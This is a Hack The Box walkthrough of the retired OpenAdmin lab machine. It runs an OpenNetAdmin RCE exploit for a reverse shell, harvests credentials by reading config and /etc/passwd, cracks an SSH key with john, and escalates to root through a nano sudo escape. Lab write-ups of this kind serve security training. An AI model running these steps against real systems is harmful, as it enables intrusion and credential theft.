HTB Walkthrough: OpenAdmin w/o Metasploit (retired)

OpenAdmin is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: OpenAdmin| Difficulty Level: Easy | Operating System: Linux

└─# nmap -sC -sV -oA OpenAdmin
Starting Nmap 7.91 ( ) at 2021–06–01 18:22 EDT
Nmap scan report for
Host is up (0.030s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Adding ‘openadmin.htb’ in /etc/hosts/. Browsing to http://openadmin.htb/ona/ reveals a ‘Open Net Admin’ portal. You are logged in by default as guest. The version is ‘OpenNetAdmin — v18.1.1’. Looking for Open Net Admin exploit.
└─# searchsploit Open Net Admin
OpenNetAdmin 18.1.1 — Remote Code Execution.
└─# searchsploit -m php/webapps/

Removing carriage returns
└─# cat | tr -d ‘\r’ >>
Exploiting and getting a reverse shell back.
└─# ./ http://openadmin.htb/ona/
$ whoami

$ grep -Ri “password” config
config/auth_ldap.config.php://$conf[‘auth’][‘ldap’][‘bindpw’] = ‘mysecretbindpassword’;

Looking for users:

$ cat /etc/passwd
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

We need to know the file path to view the contents.

$ ls config

We came to know that another config folder exists within local folder by reviewing ‘config/’.

$ cat config/

$ cat local/config/
array (
‘db_type’ => ‘mysqli’,
‘db_host’ => ‘localhost’,
‘db_login’ => ‘ona_sys’,
‘db_passwd’ => ‘n1nj4W4rri0R!’,
‘db_database’ => ‘ona_default’,
‘db_debug’ => false,

Using above db password, you can ssh into ‘jimmy’ user. We need to escalate our privileges to joanna for user flag.

jimmy@openadmin:/var/www/internal$ cat index.php
if ($_POST[‘username’] == ‘jimmy’ && hash(‘sha512’,$_POST[‘password’]) == ‘00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1’)

jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION[‘username’])) { header(“Location: /index.php”); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec(‘cat /home/joanna/.ssh/id_rsa’);
echo “<pre>$output</pre>”;
<h3>Don’t forget your “ninja” password</h3>
Click here to logout <a href=”logout.php” tite = “Logout”>Session

From above script, it will probably display ssh key when you browse index.php page. Looking for more info on what exactly to browse. As it is present inside ‘internal’

jimmy@openadmin:/var/www/html$ ss -ln | grep LISTEN
tcp LISTEN 0 80*
tcp LISTEN 0 128*
tcp LISTEN 0 128*

From above we should try SSH port forwarding.
└─# ssh -L 52846: jimmy@ -N

Browse to and enter jimmy/Revealed, you will get in. The page displays the ssh key belonging to joanna as seen from ‘/var/www/internal/main.php’.

Save the private key on kali as id_rsa. Let us extract the password from private key.
(a) Create john tool compatible hash and save the output in a file (id_john)
└─# python /usr/share/john/ id_rsa
(b) Cracking the password

└─# john id_john — wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2021–06–03 17:56) 0.1321g/s 1894Kp/s 1894Kc/s 1894KC/sa6_123..*7¡Vamos!
Session completed

SSH into the box using joanna’s credential + ssh key.
└─# ssh -i id_rsa joanna@openadmin.htb

Note: It will throw error permissions and you will get access denied if key permissions are too open. Use ‘chmod 600 <private key>’

You will get user flag.

Checking for sudo privileges

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv

As we can see that nano can be used to attain root privileges via sudo. Google search for nano gtfobins and refer this link:
We are going to follow steps mentioned in ‘Sudo’ section as we are exploiting sudo privileges.
joanna@openadmin:~$ sudo /bin/nano /opt/priv

In file, enter ‘CTRL+R’ then ‘CTRL+X’

At the bottom, a small dialog opens saying command to enter. Enter below:
reset; sh 1>&0 2>&0

You will get root shell + root flag.
Note: Shell appears right after the command. You will see a ‘#’ symbol once exploit is successful.

Security Analyst